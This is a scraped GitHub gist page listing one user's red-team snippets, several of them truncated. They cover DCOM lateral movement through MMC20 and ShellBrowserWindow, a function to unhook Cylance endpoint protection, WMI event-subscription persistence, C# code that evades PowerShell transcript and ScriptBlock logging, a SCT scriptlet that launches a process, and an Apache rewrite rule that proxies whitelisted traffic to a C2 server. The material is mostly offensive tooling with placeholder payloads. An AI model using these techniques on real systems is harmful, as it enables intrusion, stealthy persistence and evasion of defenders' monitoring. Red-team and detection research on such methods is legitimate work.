Skip to content

Instantly share code, notes, and snippets.

Ben Turner benpturner

Block or report user

Report or block benpturner

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@benpturner
benpturner / RunAs-NetOnly
Last active Sep 22, 2019
RunAs-NetOnly
View RunAs-NetOnly
Add-Type -TypeDefinition @"
using System;
using System.Runtime.InteropServices;
using System.Security.Principal;
public static class Advapi32
{
[DllImport("advapi32.dll", SetLastError = true)]
public static extern bool LogonUser(string pszUsername, string pszDomain, string pszPassword, int dwLogonType, int dwLogonProvider, ref IntPtr phToken);
[DllImport("advapi32.dll", SetLastError=true)]
@benpturner
benpturner / gist:1f2e3e7d7227b3a7e9740bba7a12fc2d
Last active Aug 4, 2019
DCOM C#
View gist:1f2e3e7d7227b3a7e9740bba7a12fc2d
# MMC (Tested Windows 7, Windows 10, Server 2012R2):
dynamic c = Activator.CreateInstance(Type.GetTypeFromProgID("MMC20.Application", "127.0.0.1"));
c.Document.ActiveView.ExecuteShellCommand(@"C:\Windows\System32\cmd.exe",null,"/c notepad.exe", "7");
## Detection: svchost.exe -DCOMLaunch (parent cmdline) -> mmc.exe (process)
# ShellBrowserWindow (Tested Windows 10, Server 2012R2):
System.Type com = Type.GetTypeFromCLSID(Guid.Parse("C08AFD90-F2A1-11D1-8455-00A0C91F3880"), "127.0.0.1");
dynamic obj = System.Activator.CreateInstance(com);
obj.Document.Application.ShellExecute("notepad.exe","","c:\\windows",null,0);
@benpturner
benpturner / gist:1f31de5331842c25f4eed585d4bd2d65
Last active Mar 15, 2019
Cy
View gist:1f31de5331842c25f4eed585d4bd2d65
function Unhook-Cylance() {
$winapi = @"
using System.Runtime.InteropServices;
using System;
public class Win32 {
[DllImport("msvcrt.dll", EntryPoint = "memcpy", CallingConvention = CallingConvention.Cdecl, SetLastError = false)]
public static extern IntPtr memcpy(IntPtr dest, string src, uint count);
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
@benpturner
benpturner / WMIEvent
Created Sep 16, 2018
WMIEvent
View WMIEvent
$Filter=Set-WmiInstance -Class __EventFilter -Namespace "root\subscription" -Arguments @{name='IEUpdateNOW';EventNameSpace='root\CimV2';QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 9 AND TargetInstance.Minute= 30 GROUP WITHIN 60"}; $Consumer=Set-WmiInstance -Namespace "root\subscription" -Class 'CommandLineEventConsumer' -Arguments @{ name='IEUpdateNOW';CommandLineTemplate="powershell -e blah";RunInteractively='false'}; Set-WmiInstance -Namespace "root\subscription" -Class __FilterToConsumerBinding -Arguments @{Filter=$Filter;Consumer=$Consumer}
#https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-
Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-
Backdoor-wp.pdf
@benpturner
benpturner / whoami.txt
Last active Sep 16, 2018
Whoami /groups
View whoami.txt
([Security.Principal.WindowsIdentity]::GetCurrent());
$tl=@{Expression={((New-Object System.Security.Principal.SecurityIdentifier($_.Value)).Translate([System.Security.Principal.NTAccount])).Value};Label="Group Name";Width=400}; ([Security.Principal.WindowsIdentity]::GetCurrent()).Groups | FT $tl
@benpturner
benpturner / posh.cs
Last active Sep 22, 2019
No Powershell with Transcript Logging Evasion & ScriptBlock Logging Evasion - eventid 4103,4104,4106
View posh.cs
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Security;
using System.Management.Automation.Runspaces;
using System.Reflection;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
@benpturner
benpturner / posh.cs
Created Jul 18, 2018
No Powershell with Transcript Logging Evasion
View posh.cs
using System;
using System.Collections.ObjectModel;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
namespace TranscriptBypass
{
// Compiling with CSC.exe v4.0.30319 or v3.5
// C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /out:C:\Temp\posh.exe C:\Temp\posh.cs /reference:System.Management.Automation.dll
// C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe /out:c:\temp\posh.exe C:\temp\posh.cs /reference:System.Management.Automation.dll
@benpturner
benpturner / perms.ps1
Last active Aug 21, 2019
Powershell Perm Review
View perms.ps1
Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation
@benpturner
benpturner / sct
Last active Mar 28, 2019
Simple CSript - Implied JScript
View sct
<cOmPoNeNt><sCRipT>
a=new ActiveXObject("Shell.Application").ShellExecute("calc.exe","","","open","0");
</sCRipT></cOmPoNeNt>
@benpturner
benpturner / Whitelist
Last active Aug 1, 2017
Apache Rewrite Whitelist
View Whitelist
# whitelist need to be formatted like so
# 104.44.44.44 -
# 104.33.33.33 -
RewriteMap ips txt:/opt/whitelist.txt
RewriteCond ${ips:%%{REMOTE_ADDR}|NOTFOUND} !NOTFOUND
RewriteCond %%{HTTP_USER_AGENT} "Mozilla\/5\.0 \(Windows NT 6\.1; WOW64\) AppleWebKit\/537\.36 \(KHTML, like Gecko\)" [NC]
RewriteRule ^/news/(.*) https://yourc2server.com/news/$1 [NC,P]
You can’t perform that action at this time.